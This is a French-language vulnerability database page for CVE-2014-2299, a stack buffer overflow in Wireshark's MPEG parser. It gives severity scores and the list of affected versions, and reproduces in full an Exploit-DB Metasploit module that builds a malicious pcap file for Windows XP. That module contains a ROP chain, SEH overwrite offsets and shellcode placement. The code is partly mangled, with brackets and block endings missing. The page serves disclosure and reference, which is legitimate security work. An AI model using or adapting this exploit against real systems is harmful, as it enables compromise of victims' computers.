Faiblesses connexes
Nom de la faiblesse |
Source |
CWE-119 |
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
9.3 |
AV:N/AC:M/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 33069
Date de publication : 2014-04-27 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
# Exploit Title: Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer
# Date: 24/04/2014
# Exploit Author: j0sm1
# Vendor Homepage: www.wireshark.org
# Software Link: http://wireshark.askapache.com/download/win32/all-versions/
# Version: < 1.8.12/1.10.5
# Tested on: Windows XP SP3
# CVE : cve-2014-2299
# Metasploit URL module:
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',
'Description' => %q{
This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
by generating an malicious file.)
'License' => MSF_LICENSE,
'Author' =>
'Wesley Neelen', # Discovery vulnerability
'j0sm1', # Exploit and msf module
'References' =>
[ 'CVE', '2014-2299'],
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],
[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],
[ 'URL', 'https://www.securityfocus.com/bid/66066/info' ]
'DefaultOptions' =>
'EXITFUNC' => 'process',
'Payload' =>
'BadChars' => "\xff",
'Space' => 600,
'DisableNops' => 'True',
'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200
'Platform' => 'win',
'Targets' =>
[ 'WinXP SP3 Spanish (bypass DEP)',
'OffSet' => 69732,
'OffSet2' => 70476,
'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version:
'jmpesp' => 0x68e2bfb9,
[ 'WinXP SP2/SP3 English (bypass DEP)',
'OffSet2' => 70692,
'OffSet' => 70476,
'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module
'jmpesp' => 0x68e2bfb9,
'Privileged' => false,
'DisclosureDate' => 'Mar 20 2014'
OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']),
], self.class)
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver:]
0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll]
0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver:]
0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver:]
0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver:]
0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver:]
0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver:]
0x00000201, # 0x00000201-> ebx
0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver:]
0x00000040, # 0x00000040-> edx
0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver:]
0x668242b9, # &Writable location [libgnutls-26.dll]
0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver:
0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]
0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver:]
0x90909090, # nop
0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver:]
return rop_gadgets
def exploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
ropchain = create_rop_chain
magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure
# Here we build the packet data
packet = rand_text_alpha(883)
packet << "\x6c\x7d\x37\x6c" # NOP RETN
packet << "\x6c\x7d\x37\x6c" # NOP RETN
packet << ropchain
packet << payload.encoded # Shellcode
packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)
# 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000
# After nseh and seh we haven't space, then we have to jump to another location.
# When file is open with command line. This is NSEH/SEH overwrite
packet << make_nops(4) # nseh
packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN
packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk
# When file is open with GUI interface. This is NSEH/SEH overwrite
packet << make_nops(4) # nseh
# seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **
packet << "\x55\x59\x80\x6b"
print_status("Preparing payload")
filecontent = magic_header
filecontent << packet
print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes")
Products Mentioned
Configuraton 0
Wireshark>>Wireshark >> Version 1.8.0
Wireshark>>Wireshark >> Version 1.8.1
Wireshark>>Wireshark >> Version 1.8.2
Wireshark>>Wireshark >> Version 1.8.3
Wireshark>>Wireshark >> Version 1.8.4
Wireshark>>Wireshark >> Version 1.8.5
Wireshark>>Wireshark >> Version 1.8.6
Wireshark>>Wireshark >> Version 1.8.7
Wireshark>>Wireshark >> Version 1.8.8
Wireshark>>Wireshark >> Version 1.8.9
Wireshark>>Wireshark >> Version 1.8.10
Wireshark>>Wireshark >> Version 1.8.11
Wireshark>>Wireshark >> Version 1.8.12
Configuraton 0
Wireshark>>Wireshark >> Version 1.10.0
Wireshark>>Wireshark >> Version 1.10.1
Wireshark>>Wireshark >> Version 1.10.2
Wireshark>>Wireshark >> Version 1.10.3
Wireshark>>Wireshark >> Version 1.10.4
Wireshark>>Wireshark >> Version 1.10.5